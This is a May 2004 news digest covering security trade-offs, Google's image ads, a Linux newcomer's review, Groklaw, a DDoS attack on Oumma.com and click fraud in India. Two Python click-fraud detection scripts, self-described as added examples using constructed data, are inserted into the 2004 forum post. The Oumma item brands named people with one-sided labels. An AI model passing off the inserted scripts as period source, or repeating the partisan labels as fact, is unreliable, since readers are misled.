Saturday, May 22, 2004

SEC: We are all security customers

By Bruce Schneier

Story last modified May 4, 2004, 4:00 AM PDT

National security is a hot political topic right now, as both presidential candidates are asking us to decide which one of them is better fit to secure the country.

Many large and expensive government programs--the CAPPS II airline profiling system, the US-VISIT program that fingerprints foreigners entering our country, and the various data-mining programs in research and development--take as a given the need for more security.
At the end of 2005, when many provisions of the controversial Patriot Act expire, we will again be asked to sacrifice certain liberties for security, as many legislators seek to make those provisions permanent.

As a security professional, I see a vital component missing from the debate. It's important to discuss different security measures, and determine which ones will be most effective. But that's only half of the equation; it's just as important to discuss the costs. Security is always a trade-off, and herein lies the real question: "Is this security countermeasure worth it?"

As Americans, and as citizens of the world, we need to think of ourselves as security consumers. Just as a smart consumer looks for the best value for his dollar, we need to do the same. Many of the countermeasures being proposed and implemented cost billions. Others cost in other ways: convenience, privacy, civil liberties, fundamental freedoms, greater danger of other threats. As consumers, we need to get the most security we can for what we spend.

The invasion of Iraq, for example, is presented as an important move for national security. It may be true, but it's only half of the argument. Invading Iraq has cost the United States enormously. The monetary bill is more than $100 billion, and the cost is still rising. The cost in American lives is more than 600, and the number is still rising. The cost in world opinion is considerable. There's a question that needs to be addressed: "Was this the best way to spend all of that? As security consumers, did we get the most security we could have for that $100 billion, those lives, and those other things?"

If it was, then we did the right thing. But if it wasn't, then we made a mistake. Even though a free Iraq is a good thing in the abstract, we would have been smarter spending our money, lives and good will elsewhere in the world.

That's the proper analysis, and it's the way everyone thinks when making personal security choices. Even people who say that we must do everything possible to prevent another Sept. 11 don't advocate permanently grounding every aircraft in this country. Even though that would be an effective countermeasure, it's ridiculous. It's not worth it. Giving up commercial aviation is far too large a price to pay for the increase in security that it would buy. Only a foolish security consumer would do something like that.

We need to bring the same analysis to bear when thinking about other security countermeasures. Is the added security from the CAPPS II airline profiling system worth what it will cost, both in billions of dollars and in the systematic stigmatization of certain classes of Americans? Would we be smarter to spend our money on hiring Arabic translators within the FBI and the CIA, or on emergency response capabilities in our cities and towns?

As security consumers, we get to make this choice. America doesn't have infinite money or freedoms. If we're going to spend them to get security, we should act like smart consumers and get the most security we can.

The efficacy of a security countermeasure is important, but it's never the only consideration. Almost none of the people reading this essay wear bulletproof vests. It's not because they don't work--in fact they do--but because most people don't believe that wearing the vest is worth the cost. It's not worth the money, or the inconvenience, or the lack of style. The risk of being shot is low. As security consumers, we don't believe that a bulletproof vest is a good security trade-off.

Similarly, much of what is being proposed as national security is a bad security trade-off. It's not worth it, and as consumers we're getting ripped off.

Being a smart security consumer is hard, just as being a good citizen is hard. Why? Because both require thoughtful consideration of trade-offs and alternatives. But in this election year, it is vitally important. We need to learn about the issues. We need to turn to experts who are nonpartisan--who are not trying to get elected or stay elected. We need to become informed. Otherwise it's no different than walking into a car dealership without knowing anything about the different models and prices--we're going to get ripped off.

Copyright ©1995-2003 CNET Networks, Inc. All rights reserved.

NEWS: Google's ad plans provoke grumbling

By Stefanie Olsen
Staff Writer, CNET News.com

Story last modified May 17, 2004, 4:00 AM PDT

Google's success in Web advertising is fast becoming bittersweet for other companies that rely on ads to pay the bills.

With the search engine's move last week to sell display advertising across the Web, Google firmly established itself as a major online advertising network and a solicitor to deep-pocketed brand advertisers. That's a meaningful shift as the Mountain View, Calif., company heads for a $2.7 billion initial public offering.

More striking is that Google will broaden its lucrative business model for direct-response ads into the brand-advertising realm, where the money gets even richer. Google's "pay-for-performance" system is built on selling keyword ads to the highest bidder and letting marketers pay only when Web surfers click on tiny text links. That runs in stark contrast to display advertising such as billboardlike banners and tall, vertical "skyscrapers," which publishers sell per thousand, without the promise of a click. (The latter is called cost per impression, or CPM advertising, and is akin to television or print ads.)

If Google's system blossoms, its publishing partners would get paid for display ads only when users click, even if they carry branding value. That has irked other online ad networks specializing in display ads, which have spent the Net's boom and bust years trying to prove that online ads are vital for influencing brand loyalty.

"Google's making a public statement that the only value of a banner is when it's clicked upon, and it flies in the face of all the research done in the last five years that demonstrates the impact a banner can have on brand awareness and purchase intent," said Dave Moore, CEO of 24/7 Real Media, a New York-based company that sells advertising for 800 sites worldwide.

"Why shouldn't I get paid for creating the step to the ultimate purchase?" Moore said.

Ultimately, publishers will make the decision about whether to adopt Google's service, and at least one major Web site has said "No."

Yet Google's move carries tremendous weight because the company has become the poster child for the second coming of the Web. With annual revenue of nearly a billion dollars, it plans to raise $2.7 billion in the largest public offering since the Internet's heyday. Its search marketing programs have helped overall online advertising prosper again and are fueling its fastest-growing sector.

Sales from U.S. search engine marketing will reach $2.1 billion this year, up from $1.6 billion last year, according to Jupiter Research. By 2008, sales are expected to hit $4.3 billion.

Pressure to grow revenue
As Google seeks Wall Street's approval, it will be under increasing pressure to show new revenue streams and growth margins. Already, it has reversed its long-held antipathy for banner ads by saying it will hawk them for publishers. Yet many advertising executives say that Google's broadening of its search engine ad network into display advertising is the only logical step in its pursuit of branding budgets, which amount to $60 billion annually for TV alone.

"Google's future revenue growth could depend on attracting major brand advertisers, because that's where the money is," said Nick Nyhan, CEO of Dynamic Logic, a brand measurement company.

In offering the image ad service, Google is responding to requests from advertisers, according to Salar Kamangar, the company's product development director. To ensure publishers and advertisers get their money's worth, Google will only run graphical ads that generate enough clicks to compensate for those from two to four tiny text ads, depending on the size of the graphic. Otherwise they'll be replaced. He added that advertisers will naturally bid a higher amount for certain keywords carrying brand value.

For now, Google has no plans to offer CPM pricing.

"Our advertisers are focused on direct response. But brand advertisers are still driving toward more clicks and more sales," Kamangar said. "We don't think this product will preclude other types of branding. This is really an added level of flexibility and value."

Google started out as a search engine and eventually followed the lead of rival Overture Services into auction-style ads that appear as tiny links on the margins of search-results pages. It later syndicated that service to outside search providers, and then, to publishers.

Specifically, Google last year introduced its AdSense service to let publishers display text ads next to content on their sites. Google's technology analyzes a publisher's page to figure out the best set of keywords to match its meaning. Then keyword-related ads are placed on the page in real time.

Going forward, Google will let advertisers attach an image to those campaigns, in four sizes. AdSense publishers can choose to run those ads in lieu of the text ads.

For some, that leap is a no-brainer.

"Search has proved that advertising on the Internet works," said Greg Stuart, CEO of the Interactive Advertising Bureau. "The media doesn't set the objective--the marketer does."

Yet for critics, it fosters concern that Google is growing too fast, without thought for the health of Internet advertising.

Search-related ads have often been equated to Yellow Pages advertising, or direct marketing in which marketers pay $5 in the hopes of making $7 after reaching the right audience in a buying mood. Brand advertising is fundamentally different. Marketers spend billions to reach the masses and leave an ephemeral impression via TV, billboards and print.

Proving ads' viability
Banner ads were introduced in the mid-1990s as the Internet's response to offline advertising. But because the Net is inherently trackable, advertisers slowly watched their rates of response to banners decline to less than 1 percent of every thousand. That called into question the viability of Web ads altogether.

As a result, Internet publishers have invested significantly in research to prove that the Web is viable for branding, too. For example, a cross-media optimization study released by the Interactive Advertising Bureau in May showed that 6 percent of sales of Ford Motor's F-150 pickup truck, introduced in late 2003, were the direct result of online ads that didn't receive click-throughs. Ads that were clicked on accounted for sales above and beyond that 6 percent.

Web advertising has turned around, with expected revenue this year of $8.4 billion, up 15 percent from last year, according to research firm eMarketer. That figure will also top sales of $8.1 billion in 2000, when the Internet ad market was at its height.

Still, one legacy of the Internet bust is the popularity of accountable advertising like cost-per-click search campaigns. In the fourth quarter of 2003, Web advertisers devoted 41 percent of their budgets to performance deals that delivered a click or a customer, according to the Interactive Advertising Bureau. That's up sharply from 26 percent in the same period of 2002. CPM deals accounted for 40 percent of last year's fourth quarter, down from 46 percent in 2002.

Google is hardly the first company to attempt cost-per-click banners, but it is certainly the largest. ValueClick is a publicly traded ad network that began by selling display ads by this measure, and it has slowly adapted to publisher demands by selling display ads by the impression. Performance display ads can range in price from 10 cents to 70 cents per click. CPM-based ads can range in price from $2 to $50 per thousand, depending on the targeting and visibility of a page, ad executives say.

Impression-based advertising makes up the lion's share of ValueClick's business today, thanks to advertisers' willingness to pay for exposure on "decent properties," said John Ardis, ValueClick's vice president of corporate strategy. "Paying by clicks goes against the branding theme and puts pressure on publishers."

Still, he added, "It's one method of marketing. It's not the be all and end all."

For big publishers like The New York Times on the Web, a Google AdSense partner, the image service is not an option. Jason Krebs, vice president of sales and marketing at NYTimes.com, said that he likes the delineation between the tiny text ads on the publisher's site and the large graphical ads it sells to Fortune 500 customers.

"We don't need our pages displayed a la Nascar, with logos all over the place," Krebs said. NYTimes.com sells ads only on a CPM basis, he added.

Some ad executives speculate that Google has seen click-through rates for text ads fall over time, much like banners have in the past. That's why it has turned to flashier graphics as a way to appease marketers.

But it could run into conflicts of interests with publishing partners. For example, a publisher may have sold a display ad campaign to Ford, allowing its ads to appear exclusively on auto-related pages. But an AdSense publisher may also display General Motors' banners on those pages because of Google's automated keyword-matching system, thereby jeopardizing its relationship with Ford.

Google said that to avoid this situation, publishers can block images or specific Web addresses of advertisers.

Some advertising executives say that there's opportunity for both systems of payment and various ad types.

"Direct marketing will always pay on cost-per-click basis. Brand advertisers will be more comfortable with cost per impression," said Chris Saridakis, COO of Pointroll, a technology company that specializes in rich-media display ads.

"The Overtures and Googles have to figure out how to translate the dollars from display ads into these paid listings, and these brand advertisers aren't going to settle for text-based ads," Saridakis said.


FREE: Windows Mobile Developer Resource Kit

The Windows Mobile Developer Resource Kit is essential for developers seeking knowledge about the latest platform advances for mobile technologies.

For new developers

This resource kit includes a wizard to help you choose the tools and SDKs you need to write your application, guidance on programs that help take your application to market, and more technical documentation to help as your skills develop.

For current Windows Mobile developers

This resource kit contains all the new SDKs for Windows Mobile 2003, emulator images and content for developing Windows Mobile 2003 Second Edition applications. It also includes new articles on developing applications that are orientation and resolution aware, so your applications can take advantage of the capabilities of the newly enabled devices.

The Resource Kit DVD includes:

* 20 new technical articles
* 20 new case studies
* eMbedded Visual C++ 3.0
* eMbedded Visual C++ 4.0
* eMbedded Visual C++ 4.0 SP3
* Developer Resources for Windows Mobile 2003 Second Edition
* Pocket PC 2002 SDK
* Pocket PC 2003 SDK
* Pocket PC 2003 Second Edition Emulators
* Smartphone 2002 SDK
* Smartphone 2003 SDK
* Smartphone 2003 Second Edition Emulators
* Compact Framework 1.0 SP2 Redistributable
* Developer Power Toys

International shipments

Orders shipped outside the United States may be subject to import duties and taxes. These would be levied once the shipment reaches your country/region. Any additional charges for customs clearance will also be the responsibility of those placing/receiving the order. These charges are not determined within this ordering process, and are not estimated in any way through this ordering procedure. Please be aware that when ordering from this site, you are considered the importer of record and must comply with all laws and regulations of the country/region in which you are receiving the goods. Customs policies vary widely depending on each region and country. Should you have any questions, please contact your local customs office for further information.
Order the Windows Mobile Developer Resource Kit

ARTICLE: A Windows Veteran's Assessment of Linux

In other posts to this group, I have seen what others view as propaganda
from the Windows camp to dissuade users from trying Linux. This has
prompted me to give my honest assessment. I am a so-called (3-month old)
newbie, having just installed my MDK10 on a home-built state of the art
machine, which includes an Athlon XP 3200+ on the nForce2 chipset (A7N8X).

Some points, good and bad:

1. OpenOffice is great. It has excellent compatibility with MSOffice. Unless
you do extensive formatting and/or programming (I do both), there really is
NO ISSUE. Fonts can be tough in OpenOffice. This needs work.

2. Multimedia - The ALSA rocks. My Audigy is not running on all cylinders
but an audiophile purist would nod approvingly at the 2.1 clean sound--free
from the overly processed crap introduced by WMA and even iTunes for that
matter. This ogg format sounds better than WMA and is smaller. Bottom line.

3. Digital Video - Personally...stick with Mac for now. MDK is shaky (at
best) and Windows gives you just enough functionality to drive you
absolutely mad trying to get it all working right.

4. Networking. With some simple tweaks, you can access local windows drives,
share files, printers, etc. With the assistance of Samba, networking and
sharing resources is very simple. Yes, it takes a bit of time to get it
looking like Windows, but it is simple to do if you want to emulate the XP
desktop look and feel. My view is that MDK should work on a feature that
does just that, looks for local nets, sets up a simple Samba profile
automatically and even drops a stupid My Windows Documents icon on the
desktop. Put KMail on there and even a Konqueror icon. Implement the
Redmond look and feel theme. It can be easily done and the rewards would be
immeasurable to newbies.

5. Desktop - KDE is all I use and know. Not only is it more configurable and
faster than XP, it is damn pretty to boot. I love the power KDE gives me
over my system. Spend just one evening with look and feel settings...it is a
blast to tweak. In my opinion....is there hope for me???? hehe

6. Software - Overall, I would make a sweeping generalization that KOffice,
and the like are about two generations behind Microsoft. But man are they
impressive. KMail and the other packages are very sharp and you have to go
out of your way to get confused with them. And the community of folks
building and refining new stuff reinvigorates this old, jaded Windows user.
And let me just say, that I am a mature .NET developer talking here (If
there is such a thing!!!). I am really looking hard at the mono project.

The above is fact, not propaganda. Linux has a ways to go to refine the
power it already has. In programmers' parlance, the interface needs to be
refined and encapsulated for Windows average users. If that means pretty
dialogs then so be it. The underlying command line and power is still there.

Personally, I think Linux is fantastic. I admire the developers and those
who support their effort. If you have trouble with MDK10 and you are a home
user, get Lindows. If you are a corporate user, get Suse or Xandros. That's
my opinion of course, but these are all great distros, certainly at the top
of the class.

Think back to the anguish and pain of Dos 4 and Win 3.0. If MDK10 is any
indicator of the future of Linux, I'd have to say it is off to a massively
impressive start!

Houston, TX

NEWS: UNIX Timeline Project -- Grokline's Status

Friday, May 21 2004 @ 11:11 AM EDT
No doubt you are wondering about what happened to the promised launch of the UNIX timeline project. Here is what happened. First, it will go live, probably on Monday, but not here on Groklaw. We will link from here to the timeline site, www.grokline.net. It's not there yet, so don't go there until Monday.
This is such a huge and complex project that MathFox needed to design software to do what we needed doing. It isn't something Geeklog can handle on Groklaw, and so I asked OSRM to host it, in part because I want the project on a server we don't share and have complete control over, and they have kindly agreed to do so, although our work is ours and will be released under a Creative Commons license for the world to enjoy and use. I also thought of some last-minute questions I wanted to ask a patent attorney prior to launch, so we can do our planning as effectively as possible.
This week, we also thought of some ways to make retrieving the information we collect a little easier, with a finer granularity, and that is what is being worked on now. John Crowley, who is doing the design work, came up with some usability improvements, which we also want to implement before we launch.
I noted in the news recently that Microsoft hired a patent attorney away from IBM, and I doubt they did that without a purpose. I am trying to figure out how best to design Grokline so as to block that purpose, as best we can. I, like you, believe that the SCO attack is just the first shot across the bow, and that patents will be the next weapon, perhaps using some other SCO-like proxy. Here's an article that relates to what I am thinking might just be one part of the general plan, ironically enough on MSNBC. I believe Grokline can help in that battle, much in the way Groklaw has helped and will continue to help in the first.
So the plan now is to launch version 0.1 of Grokline, so to speak, on Monday, and then ask you for your input and any ideas for any improvements. I am very conscious that no one is as smart as all of us together, so I look forward to your input. We'll continue tweaking, as needed. If any of you are data architects, I'd like to hear from you.
You might find PCPro's article on IBM's latest filings pertinent to this discussion:
"Indeed Greg Aharonian, who runs Patnews and the www.patenting-art.com site thinks that copyrights in software are a non-starter in the first place. 'Software copyright is so illogical that it affords little to no protection for software, if you understand the law... Software is too much functionality, utility, processes, methods [and] ideas, all governing aspects of software explicitly denied copyright protection.'"
There is a link to a paper by Mr. Aharonian, with a handy list of cases on copyright. Obviously, the SCO case is an attempt to broaden the definition of what copyright can protect in software, not only in the IBM case but most particularly in the AutoZone lawsuit, but the real battle, in my opinion, since I expect them to lose the copyright battle, will be patents. The Anderer memo showed us that SCO is likely just a stand-in for those who wish to block GNU/Linux. We have seen that there are those willing to misuse the courts as an anticompetitive weapon. The ADTI book demonstrates that the dark side is willing to unfairly smear the reputation of an honorable man. Andy Tanenbaum contacted me to let me know that there is an update on his web site, in which he provides even more clarity to his position and states plainly once again that Linus did write Linux. Also, he heard from Linus, and Mr. Brown never even contacted Linus in connection with this book. Can you imagine?
"In his email, Linus said that Brown never contacted him. No email, no phone call, no personal interview. Nothing. Considering the fact that Brown was writing an explosive book in which he accused Linus of not being the author of Linux, you would think a serious author would at least confront the subject with the accusation and give him a chance to respond. What kind of a reporter talks to people on the periphery of the subject but fails to talk to the main player?"
I also wanted to share with you a new search engine, or new to me anyway, that searches just for scientific information on the Internet. It's called Scirus, and when I searched for patents, here is what it found. Enjoy. And there is an article on the ADTI mess on IT Business that sums up like this:
"Prentice Hall could use the Tocqueville Institution report as the basis for a lawsuit, but not if it has been watching SCO, whose courtroom antics recently earned it a place in Business 2.0's 'What Doesn't Work' section. What these scandals do, in the long term, is create a culture of fear that could leave the next generation of innovators too paralyzed to develop their ideas. If we are truly living within what the report's author depressingly calls an 'intellectual property economy,' we better start distinguishing what constitutes creativity and what's a rip-off. No, Linux did not come fully-formed out of some vacuum, but by using this feeble strategy to undermine him, Torvalds' critics are stealing from the best."
So, if this is the opponent and these are their methods, and if patents are next, then that is what we need to begin thinking about, and I am.

NEWS: France: Hackers silence a leading Islamic website

The Islamic website Oumma.com was wiped off the Internet for over ten days following an attack by hackers, announced its chief editor Said Branine.
The website posted on its forum an anti-Semitic fatwa, a religious writ, allegedly from the Al Azar University of Muslim theology in Cairo, sent in by a "Muslim web surfer". The fatwa listed the "twenty fundamental faults" of the Jews as enumerated in the Koran. The forum is moderated after the texts are posted, explained Branine, and the incriminated message was erased only four hours after it was put on line.
It remained on the Islamic website long enough, however, to be spotted by a French reporter with the weekly newsmagazine Marianne. She wrote an article wondering whether the posting of such material was consistent with the site's declared goal of "promoting dialogue between religions".
Hours before Marianne was even printed, Oumma.com came under an unprecedented attack by hackers, said Branine. Millions of requests were sent to the Oumma server, producing the well-known "denial of service" condition. "We tried to switch service providers, but the hackers were really too strong," said Branine. "Our site is bothering lots of people because of our freedom of speech," went on the site's editor, who was very careful not to incriminate anyone for the wrongdoing.
Friday, following a report on the hackers' attack in the leftist daily Liberation, the site was reachable again.
Oumma.com was created in 1999. It boasts a membership of 120,000 web surfers and over 10 million hits per month. A constant propaganda tool against Israel in general and its "bete noire" Ariel Sharon in particular, Oumma.com is the mouthpiece of Tariq Ramadan, an Islamic new wave extremist theologian and a proven anti-Semite. Ramadan, grandson of Hassan al Banna, the founder of the Islamic Brotherhood, is the darling of the French-speaking left and the guru of the young Muslim generation. Soft spoken, good-looking and neatly dressed, Ramadan is being used by the Leftists as a gateway to the otherwise non-politicized Muslim youths.
He outraged some French intellectuals when he wrote on Oumma.com that when it comes to the Middle East conflict, French philosophers are driven by their community affiliation rather than by their brains. All the listed writers were supposed to be Jews. One was not. Pierre-André Taguieff, the non-Jew, wrote back that in Ramadan's mind, one had to be Jewish to support Israel.
French law forbids listing people according to their religion, race or creed. Ramadan was accordingly sued by anti-racist organizations.
The self-styled modern Ramadan was also caught off base when it was revealed that he refused to condemn the stoning of adulterous women. In his latest book, he pronounced himself for a "moratorium" on the issue.

ARTICLE: India's Secret Army of Ad Clickers - Rupees for Clicks

Posted: Fri May 21, 2004 12:14 pm Post subject: India's Secret Army of Ad Clickers - Rupees for Clicks
Tee hee... I hate to say "I told you so..." ... but... well... I told you so...

Since the introduction of Google Ads and various other 'pay for click' advertising schemes, I have been saying that it was open to abuse and that advertisers that 'pay for clicks' are probably 'paying to support some family in India and not attracting real clients or potential customers...'.

Here is a nice little story out of The Times of India that helps explain why advertisers are getting RIPPED OFF by these 'pay for click' schemes.


India's Secret Army of Ad Clickers
The Times Of India:

With her baby on her lap, Maya Sharma (name changed) gets down to work every evening from her eighth-floor flat at Vasant Vihar. Maya's job is to click on online advertisements. She doesn't care about the ads, but diligently keeps count — it's $0.18 to $0.25 per click.

A growing number of housewives, college graduates, and even working professionals across metropolitan cities are rushing to click paid Internet ads to make $100 to $200 (up to Rs 9,000) per month.

"It's boring, but it is extra money for a couple of hours of clicking weblinks every day," says a resident of Delhi's Patparganj, who has kept a $300-target for the summer.

Traffic to click overseas Internet ads — from home loans to insurance — is spreading fast in India. "I have no interest in what appears when clicking an ad. I care only whether to pause 60 seconds or 90 seconds, as money is credited if you stay online for a fixed time," says another user.

Here's how it works: online advertisers in developed markets agree to pay the hosting website each time an ad is clicked. With performance-based deals becoming dominant on the Internet, intermediaries have sprung up to "do the needful". Why, type in 'earn rupees clicking ads' in Google and you get 25,000 results.

If you advertise online, with Google AdWords or similar programs, be aware that scammy bizops like this may be driving your costs up.

The reason I find this worth noting is that these 'pay for click' scams are hurting web sites that depend on regular channels of advertising.

Advertisers have been impressed by the high number of CLICKS they get when they post a banner ad through Google Ads. They compare the clicks they get for regular banner ads against the number of 'CLICK THROUGHS' they get with these 'pay for clicks' and the statistics show that 'pay for clicks' get more clicks.

Oddly enough, no one has really taken the time to do two things:

a) compare how many of those 'pay for clicks' actually lead to closings or tangible sales...
b) take note of where all these 'pay for clicks' are originating from... After all, 2 million 'click throughs' that trace back to some slum in India is not exactly the focused or targeted market that the advertiser was hoping and paying to get their advertisement in front of.
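Both checks the post asks for can be run over an advertiser's own click log. The following is an added example (not code from the post or from any ad network): it takes constructed click records, where the `country` field is assumed to come from a GeoIP lookup already applied upstream, and reports per-country conversion rates (check a) together with per-source-IP click bursts, near-uniform dwell times and absent conversions (check b). The thresholds, field names and sample data are all assumptions for illustration.

```python
"""Click-quality analysis over an ad click log (added example, constructed data)."""
from collections import defaultdict
from dataclasses import dataclass
from statistics import pstdev


@dataclass
class Click:
    ts: int          # epoch seconds when the click was recorded
    ip: str          # source address of the click
    country: str     # assumed: GeoIP result attached upstream
    dwell_s: int     # seconds the visitor stayed on the landing page
    converted: bool  # whether a sale or signup followed this click


# Constructed sample: one address in IN clicking six times in under six
# minutes with dwell times pinned at 60/90 s and no conversions, plus a few
# organic visitors (one of them also in IN) with varied dwell times.
SAMPLE = [
    Click(1000, "203.0.113.7", "IN", 60, False),
    Click(1065, "203.0.113.7", "IN", 90, False),
    Click(1130, "203.0.113.7", "IN", 60, False),
    Click(1200, "203.0.113.7", "IN", 60, False),
    Click(1290, "203.0.113.7", "IN", 90, False),
    Click(1350, "203.0.113.7", "IN", 60, False),
    Click(1010, "198.51.100.4", "US", 12, False),
    Click(1400, "198.51.100.9", "US", 240, True),
    Click(1500, "198.51.100.21", "DE", 35, False),
    Click(1600, "198.51.100.30", "US", 5, False),
    Click(1700, "192.0.2.55", "IN", 130, True),
]


def segment_report(clicks):
    """Per-country (clicks, conversions, conversion rate): check a) in the post."""
    counts = defaultdict(lambda: [0, 0])
    for c in clicks:
        counts[c.country][0] += 1
        counts[c.country][1] += int(c.converted)
    return {k: (n, conv, conv / n) for k, (n, conv) in counts.items()}


def max_clicks_in_window(clicks, window_s):
    """Largest number of clicks from one IP inside any window of window_s seconds."""
    by_ip = defaultdict(list)
    for c in clicks:
        by_ip[c.ip].append(c.ts)
    result = {}
    for ip, stamps in by_ip.items():
        stamps.sort()
        best, lo = 0, 0
        for hi in range(len(stamps)):
            while stamps[hi] - stamps[lo] > window_s:  # slide the window start
                lo += 1
            best = max(best, hi - lo + 1)
        result[ip] = best
    return result


def flag_suspicious(clicks, window_s=600, min_clicks=5, max_dwell_stdev=15.0):
    """Map IP -> reasons for IPs that look like paid clickers: check b) in the post."""
    bursts = max_clicks_in_window(clicks, window_s)
    dwell = defaultdict(list)
    conversions = defaultdict(int)
    for c in clicks:
        dwell[c.ip].append(c.dwell_s)
        conversions[c.ip] += int(c.converted)
    flagged = {}
    for ip, samples in dwell.items():
        reasons = []
        if bursts[ip] >= min_clicks:
            reasons.append(f"{bursts[ip]} clicks within {window_s}s")
        if len(samples) >= min_clicks and pstdev(samples) <= max_dwell_stdev:
            reasons.append("dwell times nearly uniform (timer-driven)")
        if len(samples) >= min_clicks and conversions[ip] == 0:
            reasons.append("many clicks, no conversions")
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for country, (n, conv, rate) in sorted(segment_report(SAMPLE).items()):
        print(f"{country}: {n} clicks, {conv} conversions, rate {rate:.2%}")
    for ip, reasons in flag_suspicious(SAMPLE).items():
        print(f"{ip}: " + "; ".join(reasons))
```

Country alone is not the signal: the organic visitor at 192.0.2.55 is also in IN, dwells 130 seconds and converts, and is not flagged. The combination of a click burst, timer-like dwell times and zero conversions is what separates the paid clicker from that visitor, and each reason is reported separately so a reviewer can see why an address was flagged before disputing the charges.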

Eventually the advertisers whose limited budgets are being siphoned off will do a Return on Investment study and figure out that they spent a lot of money and got nothing more in return than a huge traffic flow from countries where the average monthly household income is about $100 per month or less...

But as I noted... unfortunately these ' pay for click ' schemes of Google and others are bleeding limited advertising budgets from companies, while depriving legitimate advertising channels of potential revenues.

Now I wonder why the advertising companies are so quick to support and embellish these 'pay for click' scams. Possibly they have no idea about the level of subversion and misrepresentation their click through stats represent. Or possibly the advertising agencies are simply lazy and take the pay for click route in order to generate higher number of 'apparent' click throughs to their clients.

But in the end this magical bubble is going to burst.... and I would suggest that these ' pay for clicks ' will bring about the next collapse of Internet advertising.

The original Internet advertising broke and brought on the initial collapse of Internet advertising when advertising firms placed banner ads without any focus on the intended targets or market for the product or service they were promoting.

My personal favorite example is the Oracle banner ads that were placed in the Yahoo Personal Dating area. I have never heard a reasonable explanation of who Oracle (or Oracle's advertising agency) thought they were going to sell a $100,000 database product to in an area inhabited by singles hoping to score a date...

Sadly a lot of security related web sites have fallen into the trap of believing that these 'pay for click' banner ads are their salvation to reaping some revenue to support their sites. In most cases these web sites are operating honestly and simply cross their fingers that enough of their legitimate users will click on the ads to generate some cash flow for their sites.

On the other hand, there are some 'scam' web sites, yes even in the Security scene, that are participating in these 'pay for click' schemes and are forcing clicks or creating armies of 'paid clickers' to click on these pay for click banners. After all... the web site can afford to split the profits they generate from these bogus clicks with their accomplices.

As I was looking around Google for more information on this topic, I came across this interesting discussion that appeared elsewhere.

So I can take some pleasure that I am not alone in the woods wondering about these pay for ad clicks...


This article is yet another one in the A-billion-plus-Indians-are-gonna-destroy-you genre that we’ve been seeing in recent times.

Not only is the reporter, N.Vidyasagar, trying to impart an India flavour to a topic (fraudulent banner/ad clicking) that has been around for almost as long as banner ads have been around, he is also guilty of giving false information to make his case appear stronger.

As proof of the Indian PPC racket, Vidyasagar offers the 25,000+ results on Google for the search phrase “earn rupees clicking ads”. I did run the query…and all I got was around 3,200+ results.

But if you do search for “earn dollars clicking ads”, the results are surprise, surprise…25,900!

I don’t expect much integrity or objectivity from the Slimes publications, but is it too much to expect them to not fudge commonly available figures?!?

Posted by Jivha at May 4, 2004 01:47 AM | TrackBack

Oh! Further to what I mentioned below, Google only shows 20 of those 153 results, many of them being postings like these which question N.Vidyasagar's article.

Posted by: Premnath Kudva at May 10, 2004 04:34 PM | Permalink

Actually if you run that search in Google for the search phrase “earn rupees clicking ads” within quotes you will only get 153 results. Wonder where N.Vidyasagar got that 25,000 from.

Posted by: Premnath Kudva at May 10, 2004 04:31 PM | Permalink

I want to join you.

Posted by: Deepti aggarwal at May 8, 2004 07:06 PM | Permalink

TOI should come out with a much better & more sensible article.

Posted by: raghuram at May 5, 2004 06:55 PM | Permalink

The google search you did is neat. It's really not that hard to capture the IP of the box (or at least the subnet address) from which click-throughs happen. In fact, I am quite sure it is done (I didn't check). I would (and know I can) do it if I count click throughs to pay dollars. That would pretty much eliminate any click-throughs that are geographically irrelevant. In fact, in the article, it says, "Clicks are bought to boost number of hits for web ads or online advertisers who are not tracking user location".

There may be some truth in the article. But, any decent online ad server can and will track user locations.

good day.
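The checks the commenter describes (where click-throughs originate, by IP and subnet) together with the fixed 60- or 90-second pause the clickers in the article describe, turned into a small click-log screen. This is an added example, not code from the post or the comments; the log format, the IP addresses and every value in it are constructed.

```python
from collections import Counter

# Constructed click log (not real data), one click per line:
# timestamp  client IP  GeoIP country  ad id  seconds spent on the landing page
SAMPLE_LOG = """\
2004-05-04T09:00:01 203.0.113.10 IN loan-ad-7 60
2004-05-04T09:00:03 203.0.113.11 IN loan-ad-7 90
2004-05-04T09:00:05 203.0.113.12 IN loan-ad-7 60
2004-05-04T09:00:09 203.0.113.13 IN loan-ad-7 60
2004-05-04T09:01:10 203.0.113.10 IN loan-ad-7 90
2004-05-04T09:02:44 198.51.100.7 US loan-ad-7 14
2004-05-04T09:05:12 198.51.100.8 US loan-ad-7 203
2004-05-04T09:07:30 192.0.2.55 US loan-ad-7 41
"""

TARGET_COUNTRIES = {"US"}       # where the campaign is actually sold (assumed for the sample)
PAID_DWELL_SECONDS = {60, 90}   # the fixed pauses the paid clickers describe


def parse_log(text):
    """Turn the constructed log text into a list of click dicts."""
    clicks = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, country, ad, dwell = line.split()
        clicks.append({"ts": ts, "ip": ip, "country": country, "ad": ad, "dwell": int(dwell)})
    return clicks


def subnet24(ip):
    """Collapse an IPv4 address to its /24 so a clicker rotating hosts on one network still clusters."""
    return ".".join(ip.split(".")[:3]) + ".0/24"


def flag_clicks(clicks, target_countries=TARGET_COUNTRIES, max_per_ip=1, max_per_subnet=3):
    """Attach a list of reasons to every click; an empty list means nothing looked wrong.
    A single fixed-dwell hit is weak evidence on its own; it is the share across the
    whole log (see summarize) that separates paid clicking from real visitors."""
    per_ip = Counter(c["ip"] for c in clicks)
    per_subnet = Counter(subnet24(c["ip"]) for c in clicks)
    flagged = []
    for c in clicks:
        reasons = []
        if c["country"] not in target_countries:
            reasons.append("outside-target-geo")
        if c["dwell"] in PAID_DWELL_SECONDS:
            reasons.append("fixed-dwell")
        if per_ip[c["ip"]] > max_per_ip:
            reasons.append("repeat-ip")
        if per_subnet[subnet24(c["ip"])] > max_per_subnet:
            reasons.append("subnet-cluster")
        flagged.append((c, reasons))
    return flagged


def summarize(flagged):
    """Share of clicks with at least one flag, plus how often each reason fired;
    this is the figure to put beside the raw click count an agency reports."""
    total = len(flagged)
    suspicious = sum(1 for _, reasons in flagged if reasons)
    by_reason = Counter(r for _, reasons in flagged for r in reasons)
    return {
        "total": total,
        "suspicious": suspicious,
        "suspicious_share": suspicious / total if total else 0.0,
        "by_reason": dict(by_reason),
    }


if __name__ == "__main__":
    print(summarize(flag_clicks(parse_log(SAMPLE_LOG))))
```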

I found that the use of GOOGLE SEARCH to find all the scammers seeking to cheat Google Ads ( and similar Pay For Click companies ) to be kind of amusing and ironic...

